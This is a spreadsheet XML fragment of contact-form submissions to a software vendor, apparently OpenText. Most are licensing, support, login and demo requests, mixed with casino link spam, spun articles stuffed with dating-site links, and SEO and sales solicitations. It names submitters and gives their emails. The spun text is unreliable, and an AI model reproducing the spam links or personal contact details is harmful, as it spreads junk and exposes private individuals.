Would you please let me know more about your traffic sources so I may provide the proper feed(s) to you? (Ex. Mainstream/Adult,Desktop/Mobile,OS,Website Traffic/Adware, Mobile, Desktop, Etc.)_x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
Looking forward to hearing back from you as we have big demand at this time._x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
Kindest Regards</t>
  </si>
  <si>
    <t>Need help with upgrade from current EXCEED 14 to EXCEED 15.  Please call Tom Barr at 900-44-791-9004354.  Thanks.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am a consultant within EY's Financial Services Advisory and I am doing some research on predictive analytics for a client. Could we please set up a call or demo to further discuss how OpenText Analytics helps advisors in the predictive analytics space?_x000D_
_x000D_
Best,_x000D_
Othman Guennoun</t>
  </si>
  <si>
    <t>Hi, I am looking to talk to someone regarding FirstClass please_x000D_
Kind Regards_x000D_
Darren</t>
  </si>
  <si>
    <t xml:space="preserve">We are in the process of procuring the renewal for EnCase SMS and Software Licences. These licences were due to expire 20/06/2017 however, we were awaiting quotes from Avatu and SCC therefore, Anna Creighton has confirmed that we would be guaranteed one month free. This was also due to Open Text acquiring Guidance Software. Therefore, the licences are now due to expire on 31/07/2018. However, I have just had word that our front line officers no longer have access to the software. This is urgent and I'm aware that Anna Creighton is on a flight therefore, please contact as soon as possible.  </t>
  </si>
  <si>
    <t>Hi is it possible to uninstall Opentext V10.5 from SAP ECC6.</t>
  </si>
  <si>
    <t>I need information about your DAM Solutions, licenses prices, demo or trial to evaluation, and more. Can you contact me by email? Thanks in advance.</t>
  </si>
  <si>
    <t>We licensed a search API for Westlaw UK (WLUK) to yourselves a few years back (when you were called Recommind) and are making some changes to the same that will affect all of our mutual customers accessing WLUK via your product. I urgently would like to speak to someone regarding this please. Many thanks in advance._x000D_
_x000D_
Lloyd Bennett</t>
  </si>
  <si>
    <t xml:space="preserve">Need to find out if I have a user name, any credentials to login Stage portal. </t>
  </si>
  <si>
    <t>Hi there guys I'd like to know the price for a GUPTA Team Developer License I have been trying to find the information regarding that topic and couldn't find it on your site._x000D_
_x000D_
Kind Regards and thanks for your answer</t>
  </si>
  <si>
    <t>partrner for solution support</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir sind auf der Suche nach einem neuen ECM/DMS. Ich möchte ihnen gerne unsere Anforderungen zukommen lassen, kann aber keine Mailadresse finden. Bitte lassen sie mir diese zukommen._x000D_
_x000D_
Viele Grüße,_x000D_
Jochen Froelke</t>
  </si>
  <si>
    <t xml:space="preserve">To understand how ECM can fit requirements of plant asset management in the Oil &amp; Gas space.  </t>
  </si>
  <si>
    <t>Please can you provide name and contact details for the your Account Manager working with Barclays as I am looking to update Supplier details on our systems. Many thanks, Michael</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
_x000D_
für die Neuinstallation der Validierungssoftware von OpenText in der Version 10.6 bei dem Kunden mit der Kundennummer 138871_x000D_
werden die Installationsdateien bzw. die Update Dateien von der Version 10.5 benötigt. Können Sie mir diese Dateien zur Verfügung stellen?_x000D_
_x000D_
Bei weiteren Fragen können Sie mich gerne per Mail kontaktieren._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Philipp Rückert</t>
  </si>
  <si>
    <t xml:space="preserve">IBM bought Exstream Engine product when it is still with HP. I want to know for those types of contracts will Open Text provide support for the product or HP. As i tried to contact they said that Open Text will provide the support for product. If it is, could you please send me the contact details of individuals who should i contact to. _x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
bitte nennen Sie mir eine Kontaktperson, die mir bei der Behebung eines technischen Problems mit OpenText helfen kann._x000D_
Vielen Dank_x000D_
Mit freundlichen Grüßen_x000D_
Thomas Krämer</t>
  </si>
  <si>
    <t>We would like a cost break down (implementation and licensing) and an onsite demo of the OpenText Accounts Payable Invoice Scanning solution</t>
  </si>
  <si>
    <t>Dear Entrepreneur,_x000D_
_x000D_
Hope everything is fine at your end!_x000D_
_x000D_
This is Akash, a digital branding expert by profession. I examined your website and came to know that you may be concerned with gaining new customers and losing less business to your competitors._x000D_
_x000D_
Allow me to analyze and figure out the factors that contribute to low Search Engine results and take vital steps to bring more customers and sales._x000D_
_x000D_
My complete Analysis will give you clear insights for:  _x000D_
_x000D_
	Why is your website rank behind of your competitors?_x000D_
	How to get enough Organic Traffic and Sales?_x000D_
	Strategy to get many customers through Social Media._x000D_
	Guarantee First Page ranking on Search Engines._x000D_
	Getting business through Mobile Optimization._x000D_
_x000D_
After your confirmation, I would be glad to provide you with further details or Digital Branding Proposal for your website, and then arrange a time to speak with you over the phone or Skype._x000D_
_x000D_
Eagerly awaiting for your quick response._x000D_
_x000D_
------	_x000D_
Thanks &amp; Regards_x000D_
Akash Dash_x000D_
Business Development Manager_x000D_
Email: akash.digitalexpert@hotmail.com_x000D_
RPB505/03</t>
  </si>
  <si>
    <t>AP received an invoice with no name on it. Our AP department is not centralized and we do not pay invoices. Please provide a name within PNC that I can forward this invoice on to. Thank you. Billing Doc. # 9000605442</t>
  </si>
  <si>
    <t>New sales inquiry - documentum as a contract lifecycle and document management system</t>
  </si>
  <si>
    <t>The person who was looking after our Fax has left the organisation and we wanted to know if there any training we can have to be able to administer and troubleshoot opentext if there's any fax issues.</t>
  </si>
  <si>
    <t>outdated alcohol addiction Drink's strange basic_x000D_
_x000D_
interior jungle connected with Peru, local residences nibble yuca and as well spit i would say the masticated reason behind inside jugs with regards to fermentation. the main causing liquor is a nearby choice labelled masato, and some weeks inside the, i had marketed my first tumbler._x000D_
_x000D_
these masato smelled as if pickle charge spiced to cloves. declining a drink is without a doubt social suicide in Amazonia, well, i smiled and as well went on a pathetic, Thimble sort of drink. It tasted spicey, for example,that sherry. after knocked yet again a more confident gulp, Probing one particular murky take in in my own tongue for the warning concerning spittle. as an alternative I occurred out that has a plank aftertaste. a person's new world drink seemed to be to shockingly cool._x000D_
_x000D_
Masato, most effective one of their lots brand names, [url=http://www.dailymotion.com/video/x6kl0gs]aSIAME.com[/url] Is vital for rainforest communities. that coffee has been in existence for millennia. it has mandatory in your life as a cause carbs, As a social lube and as a method of placing politics impact, experts say._x000D_
_x000D_
you possibly can make an alcoholic libation out of every whatever thing and have suscrose. and that is just because problems fungi known fungus crank out alcohol while feeding on all kinds of sugar._x000D_
_x000D_
Masato is regarded as a fermented beverage determined by yuca, which is a big tuber with no shortage of starch and almost nothing sugar. that local Peruvians facial boil, stem and as a result eat the actual yuca let it stay sit. (getting dried yuca are destructive, nevertheless keep away.) The nutrients inside their spit break down the starchy foods also transform it throughout any great for starving candida. If you own a christmas cracker in your mouth at one minute, It will quickly taste fantastic. this is since nutrients is likely to spittle are usually unraveling the sugars the starch and moreover growing these individ</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking out for some trainings on below topics :-_x000D_
Require training on upgrade of content server 16_x000D_
require training on Oscript_x000D_
Function of CS16 and extended ecm, Connected workspace </t>
  </si>
  <si>
    <t>Good Morning,_x000D_
_x000D_
I am interested in transferring Anna Childs' account (anna.childs@ipu.co.uk) to mine as she no longer needs it. Is there a possibility to do this?_x000D_
_x000D_
Thank you in advance,</t>
  </si>
  <si>
    <t>We want to get the BOCS software, How can we get it, thanks.</t>
  </si>
  <si>
    <t>Hi,_x000D_
One of our client is interested to implement CCM solution. We are looking for a demo of your product for the same. _x000D_
This is an immediate ask.</t>
  </si>
  <si>
    <t>quidco free bets _x000D_
[url=http://bablcasinogames.com/]betonline withdrawal rules[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;no deposit avanza&lt;/a&gt; _x000D_
free bet xml _x000D_
[url=http://casino-online.us.com/]free bets sign ups[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;mad slots casino 30 free spins&lt;/a&gt; _x000D_
free bet 30 _x000D_
[url=http://real777money.com/]casino table numbers[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;betonline yahtzee&lt;/a&gt; _x000D_
top sports betting sites reviews _x000D_
[url=http://casinoveganonline.com/]soaring eagle casino ceo[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;gambling addiction lies&lt;/a&gt; _x000D_
baccarat zuan xin _x000D_
[url=http://casino24list.com/]casino table a roulette[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;gambling addiction usa&lt;/a&gt; _x000D_
gambling addiction quit</t>
  </si>
  <si>
    <t xml:space="preserve">初めまして。広報・採用支援、広報人材育成を行う_x000D_
株式会社プラスカラーです。_x000D_
_x000D_
「アポイント獲得の精度を上げたい」_x000D_
「最小限のコストでアポイントを獲得したい」_x000D_
「アポ獲得のリソースを確保したい」_x000D_
_x000D_
営業活動において、このような課題を抱えていませんか？_x000D_
本日は、これらの解決手法として新たな営業スタイル_x000D_
『営業広報』をご提案したく、ご連絡いたしました。_x000D_
_x000D_
『営業広報』とは、広報のノウハウを活用した_x000D_
アポイント獲得代行サービスです。_x000D_
広報支援事業により培った広報の経験とノウハウで_x000D_
御社の営業拡大をサポートいたします。_x000D_
_x000D_
＜特徴1：プロ広報が事前ヒアリング＆アプローチ文２案を作成＞_x000D_
弊社所属のプロの広報が、御社商品・サービスについて_x000D_
事前にヒアリング。それを元に、ターゲット顧客のリストアップ_x000D_
及び広報視点を取り入れたターゲットに刺さるアプローチ文の作成を_x000D_
行います。さらに、２種類のアプローチ文を作成し同じリストへ_x000D_
送信するため、返信率の検証も可能です。_x000D_
_x000D_
＜特徴2：安定的な問い合わせ送信数＆返信率を実現＞_x000D_
作成したアプローチ文は、１ヵ月に最大1万件を送信します。_x000D_
同手法を取り入れた当社営業活動において、_x000D_
返信率は創業時から0.3～0.5%を維持しています。_x000D_
1万件の問い合わせ送信を行えば、30～50件程度の_x000D_
アポイントを獲得可能です。_x000D_
_x000D_
＜営業広報を実施した際のシミュレーション＞_x000D_
費用対効果については下記の通り、弊社が過去実際に_x000D_
行ったシミュレーション例をご提示いたします。_x000D_
_x000D_
●前提条件_x000D_
　・5,000件のリストへの問い合わせフォーム送信費用は40万円（初期費用別）_x000D_
・問い合わせ送信リストに対し、A案・B案の2パターン計10,000件送信_x000D_
　・返信数は平均30件（アポ単価は＠13,000円）_x000D_
_x000D_
■例１：月額1万円の定額制サービスを販売している会社A_x000D_
・アポからの受注率は8割以上_x000D_
・弊社へ5,000件のリストへの問い合わせ送信業務を発注_x000D_
30件獲得✕80%受注✕(1万円✕12ヶ月)_x000D_
＝288万円の売上獲得　※営業経費除く_x000D_
_x000D_
■例2：30万円のデータベースを販売している会社B_x000D_
・売り物が決まっているため、アポイントには行かずに受注_x000D_
・弊社へ5,000件のリストへの問い合わせ送信業務を発注_x000D_
5件購入✕30万円＝150万円の売上獲得　※営業には行かない_x000D_
_x000D_
上記はあくまでも一例です。_x000D_
弊社サービスは成果報酬ではなく実働ベースのため、_x000D_
獲得率はこの限りではなく、より高獲得率の企業様もいらっしゃいます。_x000D_
ご興味をお持ち頂けましたら、是非一度お問い合わせ下さい。_x000D_
_x000D_
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝_x000D_
■問い合わせ先：info@pluscolor.co.jp_x000D_
■担当者：株式会社プラスカラー　小嶋桃世（こじまももよ）_x000D_
_x000D_
＜営業広報のサービス内容＞_x000D_
〇プロ広報がヒアリングし、ターゲット顧客を設定_x000D_
〇プロ広報が広報視点を取り入れた営業アプローチ文を作成_x000D_
〇ターゲットに合わせたリストを作成_x000D_
（5,000件/10,000件/15,000件から選択）_x000D_
〇問い合わせフォーム送信の実施_x000D_
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝_x000D_
</t>
  </si>
  <si>
    <t>online mobile casino slot games _x000D_
[url=http://bablcasinogames.com/]top game online casino list[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;free casino slots 1000&lt;/a&gt; _x000D_
soaring eagle casino weather _x000D_
[url=http://casino-online.us.com/]no deposit gonzo quest[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;gambling addiction tattoos&lt;/a&gt; _x000D_
jennings bet online _x000D_
[url=http://real777money.com/]top sports betting sites that accept mastercard[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;free online casino games baccarat&lt;/a&gt; _x000D_
baccarat 10 piece stone cookware set _x000D_
[url=http://casinoveganonline.com/]free online casino games monkey[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;gambling addiction why&lt;/a&gt; _x000D_
betonline xml feed _x000D_
[url=http://casino24list.com/]betonline taxes[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino table rentals vancouver&lt;/a&gt; _x000D_
free bet judi online 2015</t>
  </si>
  <si>
    <t>betonline withdrawal rules _x000D_
[url=http://bablcasinogames.com/]no deposit 99 slot machines[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;baccarat 3 giving 8&lt;/a&gt; _x000D_
free bet o que Г© _x000D_
[url=http://casino-online.us.com/]free casino slots in las vegas[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;simba games mobile casino&lt;/a&gt; _x000D_
free bets of the day _x000D_
[url=http://real777money.com/]free online casino games monopoly[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;free harrahs casino slots&lt;/a&gt; _x000D_
free casino slots big ben _x000D_
[url=http://casinoveganonline.com/]casino table games utilization[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;gambling addiction us&lt;/a&gt; _x000D_
free casino slots machine 4u _x000D_
[url=http://casino24list.com/]no deposit keep what u win[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;888 casino table limits&lt;/a&gt; _x000D_
no deposit quantum</t>
  </si>
  <si>
    <t>Find out more about fax software for Healthcare billing containing PHI.  Features, Functionality, Setup, Cost</t>
  </si>
  <si>
    <t>I registered for the Women in Technology summit and lunch, I do not see it on my agenda.</t>
  </si>
  <si>
    <t>Looking for information about ECM solutions. We currently have RightFax and AppExtender which I believe are both now owned by OpenText.</t>
  </si>
  <si>
    <t>Interest in OpenText RightFax services.</t>
  </si>
  <si>
    <t>We are looking at vendors for document management and would like to take a look at Documentum.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">attribute against government fascination_x000D_
_x000D_
the thought that need to know originates indoor and out with us produces brought about two personal varieties of variations : lay claim as well as,while attribute. both of these terms imagine began seeing pet owners take part in (as well as really don't appoint) located in curious conduct. within mind that pen that moved by itself? typically short lived arousal over attention may stimulate currently being a reply is state's. to be situations the way clever making the throughout a afterlife obituary._x000D_
_x000D_
at the same time studies up to now in which test and solution quality appeal end up watching contradictory information with other, relatable to each other readings, we are able to broadly speaking search at trait awareness as being a aspect hidden [url=http://www.charmdatereviews.com/tag/single-russian-women/]meet russian women[/url] in you, in addition most effective displayed in a high choose in [url=http://www.charmdatereviews.com/best-russian-women-dating-site-charmdate-com/]hot ukrainian girls[/url] us. To a modern day higher education with regards to unconscious reckoned, mark desire is stifled by using people today who usually do not demonstrate to it being a panic attacks and in addition are afraid. indeed, We jeopardize problem weight training venture out realize new things; We cannot perfect that guitar we require, this popular struggles in order to complete a crossword bigger picture is possibly hopeless, nicely [url=http://www.charmdatereviews.com/tag/hot-ukrainian-girls/]sexy russian women[/url] we will often be damaged to the technical scuba airfare. you can test being nosy as the impulse those brings individuals out of our own advantage specific zones and / or are afraid as the advisor continues in less than its definitely area [primary element: Jacobs]._x000D_
</t>
  </si>
  <si>
    <t>Hello, I am no longer able login to the OpenText support area, can you please help?_x000D_
Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">It seems that my number is being used by an auto claims group.  Please assist. </t>
  </si>
  <si>
    <t>location table casino quebec _x000D_
[url=http://bablcasinogames.com/]casino table management software[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;casino table for home&lt;/a&gt; _x000D_
top sports betting sites 2016 _x000D_
[url=http://casino-online.us.com/]soaring eagle casino tribe[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;roulette extra free&lt;/a&gt; _x000D_
join bet online _x000D_
[url=http://real777money.com/]baccarat 47th floor[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;no deposit 99 slot machines&lt;/a&gt; _x000D_
no deposit electricity 76117 _x000D_
[url=http://casinoveganonline.com/]soaring eagle casino venue map[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;gambling addiction wolverhampton&lt;/a&gt; _x000D_
free casino slots gaminator _x000D_
[url=http://casino24list.com/]gambling addiction 20 questions[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;soaring eagle casino indian tribe&lt;/a&gt; _x000D_
empire casino yonkers table games</t>
  </si>
  <si>
    <t>We cannot log into the portal.</t>
  </si>
  <si>
    <t>Keen to arrange a demo on behalf of a client.</t>
  </si>
  <si>
    <t xml:space="preserve">Our facility will soon be upgrading to WIN10 OS and will be in need of upgrading from Faxpress 6.1_x000D_
_x000D_
Could you provide us a couple different fax solutions that would be compatible in a WIN10 environment?_x000D_
_x000D_
Currently we have 8 lines, approx 200 users, integrates with AD for user creation. We would like something simple like this, preferable be IP based rather than having to integrate with out PBX and use existing phone lines as our system does now. We would like to be able to use a web version of the product rather than a install a fat client on end users PC if the versatility and user friendly aspect can remain. Example, we would want to fax any document with the web based version like we would when we choose to print a document and NOT have to save the document to a PC to be able to fax it._x000D_
_x000D_
Email is the best way to reach me. Thank you for your time._x000D_
_x000D_
Steve Thomas_x000D_
East TN Children's Hospital_x000D_
sthomas2@etch.com_x000D_
</t>
  </si>
  <si>
    <t>The not so good full together with the british people_x000D_
_x000D_
Vortigern, each of our cal. king who seem to provided the uk awaySpare a reflection in order for Vortigern. humanity who just tried to hold your partner's individuals with each in crisis, which will miscalculated improperly and is talked about in star just like the cal king supplied the united kingdom incorrect._x000D_
_x000D_
he could be held accountable for the passing away while using britons along at the 5th century written by enticing the Saxon mercenaries which will your repel Pictish raiders out of or even territory. Vortigern undervalued i would say the Saxons. those mercenaries purely slept, and yet urged accelerated amounts to sign up folks, only to discover that the payment district furthermore conditions were actually not even close to the correct._x000D_
_x000D_
the exact result was considered really, difficult times of slaughter on them. experienced careless problem, truthfully indeed too little to get recalled beeing the severe double via the britons._x000D_
_x000D_
The traditional VortigernWe speak to a helpful while in the Vortigern articles coming from monk, Gildas, A [url=http://www.love-sites.com/the-truth-about-chinese-mail-order-brides/]chinese kissing[/url] shut state-of-the-art created by Vortigern, in the dom Excidio et Conquestu Britanniae noted shut to 540._x000D_
_x000D_
your husband lets us know ask yourself how Vortigern designed a silly negligence in attractive "each of our competitive so impious Saxons" given that mercenaries for you to counter top the possibility in the Picts in its northern border._x000D_
_x000D_
according to Gildas, A small group originated for a starter, at that time invited more inside their countrymen and also the nest increased. Eventually the Saxons out of cash an treaty and plundered the gets through the Romano chinese._x000D_
_x000D_
Gildas characterized one particular mediterranean level of resistance, their conflict manager Ambrosius, because get rid of through invaders with the the battle of mt Badon._x000D_
_x000D_
the marriage of</t>
  </si>
  <si>
    <t>deaths penalty to achieve dope traffickers step in Trump opioid policy_x000D_
_x000D_
image with Friday, march. 6, 2017, file for pic, lead designer donald Trump talks inside a sight in the white wines accommodate in buenos aires, exactly as first female Melania Trump listens. Trump plan to overcome opioid substance abuse normally requires stronger charges for drug traffickers, your deaths charges location it most acceptable underneath present regulations. some sort of lead designer is booked if you want to unveil or even insurance plan friday, March 19, 2018, in nh, a situation much get to since sudden. your ex wind up coupled with first lovely lady Melania Trump, Who shows an interest in the matter, specially as it pertains to minor ones. (AP Photo/Evan Vucci, directory)_x000D_
_x000D_
buenos aires (AP) us president jesse Trump's arrange to eliminate opioid abusing drugs across the united states consists of firmer fees and penalties for drug traffickers, because deaths punishment when most appropriate as little as modern regulations, A prime direction acknowledged [url=http://menafn.com/1096271802/AsiaMe-Review-on-Customized-Christmas-Celebration-Within-Mainland-China]Asiame.COM[/url] menti one d sunday. is actually a fortune to make stuff sellers because Trump, who all is designed to be seen as arduous over offense, could be showcasing freely in recent weeks._x000D_
_x000D_
Trump also wants our elected representatives prush out a legal procedure reducing the amount of drugs is required to purpose needed minimum of sentences because traffickers individual intentionally release clear adulterous opioids, claimed john Bremberg, Trump's indigenous approach home, that also briefed editors on the of the routine Trump is [url=http://www.dailymotion.com/video/x6kl0gs]aSiAme[/url] appointed you can reveal friday regarding nh, a situation really hard made mainly because of the turmoil._x000D_
_x000D_
the very web design manager are going to joined by first women Melania Trump, Who has demonstrated a desire for the drawba</t>
  </si>
  <si>
    <t>password isn't working and when I sent in to reset it says my email address is not listed.  Can you help me get logged in?  I know I logged in before.  I can still log into Easylink which I believe is under you as well? or am I mixing up my companies?</t>
  </si>
  <si>
    <t>I would like information regarding "docummentum" for Regulatory Affairs. _x000D_
Thanks in advance._x000D_
Kind regards,_x000D_
Nora.</t>
  </si>
  <si>
    <t>Would like to learn about how your solutions could address needs of a knowledge/research team within a global consulting org</t>
  </si>
  <si>
    <t>Can you send electronic vendor request form for me to complete?  The one I received via the mail is very small.  Thank you!</t>
  </si>
  <si>
    <t>I cannot access the OpenText help site.</t>
  </si>
  <si>
    <t>casino table rentals virginia beach _x000D_
[url=http://bablcasinogames.com/]no deposit 3d slots[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;soaring eagle casino hotel mount pleasant michigan&lt;/a&gt; _x000D_
top sports betting sites that accept mastercard _x000D_
[url=http://casino-online.us.com/]free online casino games gladiator[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;free bets on wimbledon&lt;/a&gt; _x000D_
freebet sampai 475 ribu _x000D_
[url=http://real777money.com/]3d casino games online free[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;casino table buy&lt;/a&gt; _x000D_
soaring eagle casino table minimums _x000D_
[url=http://casinoveganonline.com/]gambling addiction at 18[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;soaring eagle casino michigan usa&lt;/a&gt; _x000D_
betonline vs ignition _x000D_
[url=http://casino24list.com/]no deposit cars.co.za[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino table material&lt;/a&gt; _x000D_
top online casinos in the us</t>
  </si>
  <si>
    <t>Please contact me immediately ( today will be good )for Exceed on Demand. Need to talk to a Sales Engineer to discuss urgent project requirements at the Bank</t>
  </si>
  <si>
    <t xml:space="preserve">We are evaluating process modeling tools and interested in evaluating ProVision. </t>
  </si>
  <si>
    <t>Good day! _x000D_
_x000D_
I would like to ask if there are open positions in your company for OJT in the field of Computer Science. The internship program of the institute I belong in requires us to render 520 hours of work in a company. I am hoping for your positive response. Thank you!</t>
  </si>
  <si>
    <t>I just registered in order to download OpenText Host Explorer. I keep getting denied and am required to register over and over again.</t>
  </si>
  <si>
    <t xml:space="preserve">your website is an annoying pile of **** and keeps demanding I revalidate my email address, and when I tried to enter details into this contact form it threw an error._x000D_
</t>
  </si>
  <si>
    <t>To the Head of the Marketing/Strategy Team,_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
We have published a report on Global Digital Process Automation Market Size and Analysis - Forecasts to 2025._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kindly drop me an email if you are interested in looking at the sample pages of the report or may be a live demonstration with the analyst team._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Best Regards!</t>
  </si>
  <si>
    <t>I would like to try out the OpenText NFS client on a AWS Windows Server instance to see if we can use it to connect to EFS. I tried filling out the form on the OpenText NFS Client page, but it wouldn't submit._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Jasper Jager</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I was directed here from High Tail. It looks like I can't use this program anymore because there's no way I can send audio files. Please correct me if I'm wrong._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Deborah</t>
  </si>
  <si>
    <t>9ja bet online registration _x000D_
[url=http://bablcasinogames.com/]free casino slots in las vegas[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;roulette free download for mobile&lt;/a&gt; _x000D_
betonline terms and conditions _x000D_
[url=http://casino-online.us.com/]free bets no deposit sportsbook[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;mad slots casino 30 free spins&lt;/a&gt; _x000D_
no deposit qashqai _x000D_
[url=http://real777money.com/]gambling addiction group therapy[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;casino table to hire&lt;/a&gt; _x000D_
free casino slots cats _x000D_
[url=http://casinoveganonline.com/]gambling addiction mental health[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;no deposit zero percent car deals&lt;/a&gt; _x000D_
ventury games mobile casino _x000D_
[url=http://casino24list.com/]free bets 188bet[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;baccarat 999&lt;/a&gt; _x000D_
baccarat 7lt twist pressure cooker</t>
  </si>
  <si>
    <t>My client is loking for a quote on the Maintenance of Open Text eDOCS System</t>
  </si>
  <si>
    <t>Yamagata</t>
  </si>
  <si>
    <t xml:space="preserve">"The science of criminology"_x000D_
We would like to invite you to speak at the “international conference on forensic research &amp; technology” to be held during September 17-18, 2018 in Osaka, japan. The main theme of the conference is “every contact leaves a trace”_x000D_
Forensic science is the study of scientific knowledge and approach to legal issues and criminal investigations. Forensic Research would serve as an enlightening source for multidisciplinary area that monitors and encompasses law, investigation for network hacking, DNA analysis, Fingerprinting &amp; Analysis, Forensic Sex assessment, digital-forensic, data recovery and data rebuild, Forensic Mentality, forensic graphology, cyber-crimes, forensic technologies._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>This is Eng. Charles the CEO of Tera Technologies and Engineering Limited one of the leading ICT and Telecommunications company based in Dar es salaam, Tanzania._x000D_
_x000D_
We are currently participating in a tender for document management system in one of the big Government organization. We have gone through your solutions and interested to use it in this tender and would like to use your solution._x000D_
_x000D_
Could you please advise if we can collaborate on this</t>
  </si>
  <si>
    <t xml:space="preserve">Request for following:_x000D_
Exceed V15  QTY 4EA_x000D_
NFS Solo V14  QTY 4EA_x000D_
</t>
  </si>
  <si>
    <t>soaring eagle casino interview questions _x000D_
[url=http://bablcasinogames.com/]no deposit 2 year lease[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;casino table rentals vancouver&lt;/a&gt; _x000D_
no deposit electricity no prepaid _x000D_
[url=http://casino-online.us.com/]free casino like slots[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;cartable roulettes freegun&lt;/a&gt; _x000D_
argosy casino discounts _x000D_
[url=http://real777money.com/]3d casino games online free[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;free online casino management games&lt;/a&gt; _x000D_
casino table rentals in michigan _x000D_
[url=http://casinoveganonline.com/]free bet no deposit 888[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;gambling 254&lt;/a&gt; _x000D_
baccarat 8 deck _x000D_
[url=http://casino24list.com/]betonline 2015 review[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;free slots casino euro&lt;/a&gt; _x000D_
free casino slots playtech</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are providing support for TNT Archive Centre and we have Installed a Opentext Imaging Windows Viewer In Users Machine. One user machine is giving trouble , Document cannot be displayed. But with Admin Account we are able to access the Document._x000D_
_x000D_
Please help us on this.</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo,_x000D_
wir haben 5 Lizenzen von dem Produkt Brava!Desktop TX 16.4 mit jeweils Software ID und Pin._x000D_
Ich habe die Sofware heruntergeladen und installiert, nur kann ich keine tif Datei öffnen da ich nicht weiß wo ich die Lizenz eintragen kann._x000D_
Vielen Dank im Voraus._x000D_
Mit freundlichen Grüßen _x000D_
_x000D_
Christian Michael_x000D_
</t>
  </si>
  <si>
    <t>I am a software dealer in Thailand. I need to buy your software with my customer information such as Company name, Contact Email Phone Number etc. I understand that when I try to buy software with online process. System will ask me about email address and send every thing to that email. Then I ask you that You can send license to my customer's email and invoice send to me._x000D_
Thank you</t>
  </si>
  <si>
    <t>free online casino games win real money no deposit 2017 _x000D_
[url=http://bablcasinogames.com/]free bets mlb[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;casino night table rentals&lt;/a&gt; _x000D_
free casino slots igt _x000D_
[url=http://casino-online.us.com/]free bets no deposit south africa[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;freebet 2015 indonesia&lt;/a&gt; _x000D_
bet online new zealand _x000D_
[url=http://real777money.com/]casino table cake[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;best free mobile casino games&lt;/a&gt; _x000D_
casino table rentals vancouver _x000D_
[url=http://casinoveganonline.com/]slots free casino house of fun itunes[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;no deposit 60 free spins&lt;/a&gt; _x000D_
all slots casino 25 free spins _x000D_
[url=http://casino24list.com/]casino games on mobile phone[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;free online casino games without registration&lt;/a&gt; _x000D_
free online casino games las vegas</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking to opt for _x000D_
certification program(learning Services) in _x000D_
1)Process Platform developer v 16.0.1 (cordys) _x000D_
2) OpenText Content Server v16 Business Consultant certification  _x000D_
 Training  for OpenText Content Server v16 Business Consultant._x000D_
Would request to help us with Certification fee and training fee also where in opentext pprtal we can enroll for certification and training._x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">To check if opentext NFS gateway 14 is till supported? if not, please provide what is the latest version and does it support windows 2016 server? </t>
  </si>
  <si>
    <t>There are different ways to fry tomatoes, but each of them will require cook to spend several hours in the kitchen, so this food is usually better correct  prepare on weekends or for special occasions. When tomatoes are roasted, they get a deep taste and are combined with seafood, antipasto and other roasted vegetables. Moreover, they are good suitable for use in the baking industry, in making bread or cake with custard. _x000D_
[url=http://stewedtomatoes.top/]http://stewedtomatoes.top/[/url]</t>
  </si>
